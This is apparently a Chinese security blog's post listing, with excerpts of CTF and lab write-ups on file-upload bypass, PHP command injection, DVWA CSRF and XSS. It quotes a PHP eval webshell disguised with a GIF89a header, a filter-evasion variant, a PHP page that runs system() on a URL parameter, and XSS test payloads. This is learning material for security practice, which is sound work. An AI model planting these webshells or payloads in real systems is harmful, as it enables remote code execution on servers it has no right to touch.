- 博客(4)
- 收藏
- 关注
RSS订阅原创 [极客大挑战 2019]Upload
[极客大挑战 2019]Upload打开题目后有个上传图片的地方选择文件上传这里尝试上传1.jpg1.jpg内容为:GIF89a<?php@eval($_POST[cmd]);?>用bp抓包将jpg改为phtml,尝试上传结果显示上传失败,失败原因:文件中包含<? ,对<?进行了过滤这时候换一句话木马,一句话内容为:GIF89a<script language="php"> eval($_POST['cmd']);</scr
2021-06-04 11:36:32
80
原创 命令注入
利用php文件进行命令注入的几种方法(添加参数可执行DOS命令):1.system()system.php<meta charset='gb2312'><?phpif(isset($_GET['cmd'])){ echo "<pre>"; system($_GET['cmd']);}?>URL中接入?cmd=DOS命令例:?cmd=ipconfig //查看IP2.exec()exec.php<meta charset="
2021-04-12 21:23:18
213
原创 DVWA-CSRF
DVWA-CSRF(跨站请求伪造攻击)开始前先查看要进行被csrf漏洞注入的客户机的IP如图为10.212.63.93low用kali进行攻击,打开kali终端netstat -ntulp | grep 80 //查看所有80端口使用情况service apache2 start //启动阿帕奇打开阿帕奇后在浏览器URL栏中输入被攻击客户端的IP可进入DVWA将被攻击端和攻击端都调到low,在CSRF修改密码栏中输入自己想进行攻击修改的密码,进行burpsuite抓包,复制DVWA-m
2021-03-23 21:09:05
183
原创 xss漏洞
XSSxss(跨站脚本攻击),是最常见的web应用安全漏洞,通过巧妙的方法注入恶意指令代码到网页,使用户加载并执行攻击者恶意制造的网页程序。这些恶意网页程序通常是JavaScript.漏洞PoC检测漏洞.<script>alert ( 'xss')</script>显示窗口显示xxs. <a href=" onclick=alert('xss')>type</a>显示链接名type,点击链接显示窗口xxs. <img src=http:/
2021-03-20 15:00:37
2382
10
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人